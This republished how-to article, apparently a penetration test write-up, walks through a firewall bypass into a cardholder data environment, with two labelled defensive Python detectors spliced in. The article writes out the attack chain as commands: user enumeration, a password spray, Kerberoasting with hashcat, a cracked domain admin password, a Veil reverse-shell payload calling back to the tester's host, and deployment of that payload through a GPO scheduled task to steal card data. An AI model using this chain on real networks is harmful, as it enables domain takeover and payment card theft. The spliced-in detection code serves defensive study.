
How to use the Windows domain to bypass the firewall to obtain access to cardholder data

2025-02-28 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article explains in detail how a Windows domain can be used to bypass a firewall and gain access to cardholder data. The editor shares it as a reference; after reading it you should have a working understanding of the technique.

We will show how a firewall is bypassed to reach the cardholder data environment (CDE). The ultimate goal: extract the credit card data held by the target.

If your network stores, transmits or processes credit card data, that data must be effectively protected. Under the PCI Data Security Standard (PCI-DSS), cardholder data may flow within the internal network provided the network is segmented; the boundary of that scope (separating the cardholder data environment from the rest of the network) is normally enforced by a firewall.

To protect the client's confidential data, the network details given here have been altered. Suppose the company has a very large network with all addresses in the range 10.0.0.0/8. Cardholder data is placed in a separate range, 192.168.0.0/16, isolated behind the firewall.

Note: the CDE in this case is a call center whose staff take telephone orders and enter payment details into a web form.

This is an internal test, so we connect directly to the company's office network (the 10.0.0.0/8 range) and scan the CDE from there with a ping sweep and a port scan:

A ping sweep is equivalent to running the ping command against each address, but nmap covers the whole range in one command. The "hosts up" count in the second output comes from the -Pn option, which skips the ping check, so nmap treats every address in the range as up.

This approach therefore gets us nowhere unless the firewall rules contain a bypassable flaw or the firewall uses weak passwords. Instead, the first thing we do is take control of Active Directory by obtaining domain administrator privileges.

How do I become a domain administrator?

In our scenario we chose Kerberoasting to take over the domain. The first step in attacking Active Directory is usually to obtain any user account that can authenticate to the domain controller. In Windows every domain account can authenticate to the domain controller, even one with no permission to do anything else: the least privileged account still authenticates as long as the username and password are correct.

At this client's site the domain controller, 10.0.12.100 ("PETER"), allows the session enumeration we need, so we can use a tool such as enum4linux to list the domain's users and obtain each username:

$ enum4linux -R 1000-50000 10.0.12.100 | tee enum4linux.txt

Once we have the user list, we can parse it:

$ cat enum4linux.txt | grep '(Local User)' | awk '$2 ~ /MACFARLANE\\/ {print $2}' | grep -vP '^.*?\$$' | sed 's/MACFARLANE\\//g'

The network is large, with more than 25,000 active users; for this demonstration I used grep to filter the list down to a small subset.

With the user list in a text file, we can use a tool such as CrackMapExec to guess passwords. Here we test whether any of the accounts uses the password "Password1":

$ cme smb 10.0.12.100 -u users.txt -p Password1

To keep going after the first hit rather than stopping, add the "--continue-on-success" option:

Once we have a valid user account, we can query Active Directory for the list of service accounts. Service accounts are user accounts under which services such as Microsoft SQL Server run. Active Directory's Kerberos authentication grants access to such services through "service tickets" issued to the requesting user.

By requesting the list of Kerberos service accounts from the domain controller, we also obtain a service ticket for each account. Each ticket is encrypted with the service account's password, so if we crack that password offline we can use the account, and service accounts are often highly privileged:

We can see that one of the accounts is a member of the Domain Admins group, so we target it directly:

$ hashcat -m 13100 --potfile-disable SPNs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

After Hashcat finishes, we have the plaintext password:

This is an active account, so we can use CrackMapExec again:

$ cme smb 10.0.12.100 -u redrum -p 'murder1%'

Very good, we have a domain administrator account!
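A detection for the two domain-controller-side steps above (the CrackMapExec password guessing and the Kerberoast ticket requests), added here as an example that is not part of the article: it runs one sliding-window burst check over constructed Windows Security events 4625 and 4769, written in a key=value form assumed to come from a SIEM export rather than a real log file.

```python
"""Spot a password spray (many accounts failing from one host, event 4625)
and Kerberoasting (one account pulling RC4 service tickets for many SPNs,
event 4769) from constructed key=value security events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (assumption: SIEM export, not a raw event log).
SAMPLE = """\
t=2024-05-31T09:00:01 id=4625 src=10.0.12.1 user=alice
t=2024-05-31T09:00:02 id=4625 src=10.0.12.1 user=bob
t=2024-05-31T09:00:02 id=4625 src=10.0.12.1 user=carol
t=2024-05-31T09:00:03 id=4625 src=10.0.12.1 user=dave
t=2024-05-31T09:02:10 id=4625 src=10.0.5.9 user=alice
t=2024-05-31T09:30:00 id=4769 user=dave service=MSSQLSvc/db01 enc=0x17
t=2024-05-31T09:30:01 id=4769 user=dave service=HTTP/intranet enc=0x17
t=2024-05-31T09:30:01 id=4769 user=dave service=svc_backup enc=0x17
t=2024-05-31T09:31:00 id=4769 user=erin service=MSSQLSvc/db01 enc=0x12
"""

def parse(text):
    events = []
    for line in text.splitlines():
        e = dict(kv.split("=", 1) for kv in line.split())
        e["t"] = datetime.fromisoformat(e["t"])
        events.append(e)
    return events

def bursts(events, key, value, window, min_distinct):
    """Group events by `key`; report keys that touch at least `min_distinct`
    different `value`s inside any sliding `window`, with the values seen."""
    grouped = defaultdict(list)
    for e in sorted(events, key=lambda e: e["t"]):
        grouped[e[key]].append(e)
    hits = {}
    for k, evs in grouped.items():
        for i, first in enumerate(evs):
            seen = {e[value] for e in evs[i:] if e["t"] - first["t"] <= window}
            if len(seen) >= min_distinct:
                hits[k] = sorted(seen)
                break
    return hits

def password_spray(events, window=timedelta(minutes=5), min_accounts=4):
    failures = [e for e in events if e["id"] == "4625"]
    return bursts(failures, "src", "user", window, min_accounts)

def kerberoast(events, window=timedelta(minutes=5), min_services=3):
    # Only RC4 (0x17) tickets: AES (0x11/0x12) is the modern default, and
    # roasting tools ask for RC4 because it cracks fastest in hashcat.
    rc4 = [e for e in events if e["id"] == "4769" and e.get("enc") == "0x17"]
    return bursts(rc4, "user", "service", window, min_services)
```

Thresholds are deliberately low for the sample; tune the window and minimum counts against your own baseline before alerting on them.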

Although we still have no direct access to the target devices, we can have the domain controller interact with them on our behalf through the Active Directory domain. Our goal is to take control of the call center computers inside the CDE, which sit in the same Active Directory. To do that we need to understand Group Policy Objects (GPOs).

A GPO applies settings to users and computers at various scope levels, so it can control computers across the domain. Most GPO features serve the central management of IT settings in an organization: setting a uniform password policy, or choosing which icons appear on users' desktops (for example a shortcut to the company website). One GPO feature can create Windows scheduled tasks, and that is exactly what we need.

I created a script that, when run on a target machine, connects back to our machine. The steps:

1. Generate the payload. Here we use Veil Evasion. Our IP address is 10.0.12.1, so the payload is set to connect back to that address:

$ veil -t EVASION -p 22 --ip 10.0.12.1 --port 8755 -o pci_shell

2. Log in to the domain controller over Remote Desktop Protocol (RDP) using the credentials obtained by Kerberoasting.

3. Locate the CDE in Active Directory. From what we know of the target, the call center is on the second floor; browsing the directory, we find an entry with a telling name:

4. Place the script built with Veil in a folder on the domain controller and share it. Set the share and directory permissions so that all domain users can read it:

5. Create a GPO:

6. When editing the new GPO, open "Scheduled Tasks" and create a new task that runs immediately ("schedule tasks now"):

7. Point the task at the shared script. Under Common, also set "Run in logged-on user's security context":

After a short wait, this is the result:

Yes, that is the payment card data we were after:

The intrusion is complete.

That concludes this article on using a Windows domain to bypass the firewall and gain access to cardholder data. I hope the above content is of some help and that you have learned something from it. If you think the article is good, share it so that more people can see it.
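An audit of the GPO step above from the defender's side, added here as an example that is not part of the article: it parses a constructed ScheduledTasks.xml from SYSVOL (assumed to follow the Group Policy Preferences layout) and flags tasks that run immediately, launch from a network share, or run in the logged-on user's security context.

```python
"""Audit a Group Policy Preferences ScheduledTasks.xml for tasks of the kind
built above. Sample file is constructed; assumption: the Preferences layout
ImmediateTaskV2/TaskV2 > Properties > Task > Actions > Exec > Command."""
import xml.etree.ElementTree as ET

SAMPLE_XML = r"""<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 name="Deploy helper">
    <Properties action="C" name="Deploy helper"
                runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken">
      <Task version="1.2"><Actions Context="Author">
        <Exec><Command>\\dc01\share\pci_shell.exe</Command><Arguments/></Exec>
      </Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 name="Clean temp">
    <Properties action="C" name="Clean temp" runAs="NT AUTHORITY\System">
      <Task version="1.2"><Actions Context="Author">
        <Exec><Command>C:\Windows\System32\cmd.exe</Command>
              <Arguments>/c del /q C:\Temp\*.tmp</Arguments></Exec>
      </Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>"""

def audit_scheduled_tasks(xml_text):
    """Return one finding per task worth a second look, with the reasons
    that triggered it; an empty list means nothing matched."""
    findings = []
    for task in ET.fromstring(xml_text):
        props = task.find("Properties")
        cmd = task.find("Properties/Task/Actions/Exec/Command")
        if props is None or cmd is None or not cmd.text:
            continue
        command = cmd.text.strip()
        run_as = props.get("runAs", "")
        reasons = []
        if command.startswith("\\\\"):      # UNC path: binary is pulled off a share
            reasons.append("command on network share")
        if "%LogonUser%" in run_as:         # runs as whoever happens to be logged on
            reasons.append("runs in logged-on user's context")
        if task.tag == "ImmediateTaskV2":   # fires at the next policy refresh
            reasons.append("immediate task")
        if reasons:
            findings.append({"name": task.get("name"), "command": command,
                             "run_as": run_as, "reasons": reasons})
    return findings
```

Run it over every Machine\Preferences\ScheduledTasks\ScheduledTasks.xml under SYSVOL, and pair it with alerting on GPO creation and modification on the domain controller, since the task file only exists after the policy has been written.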
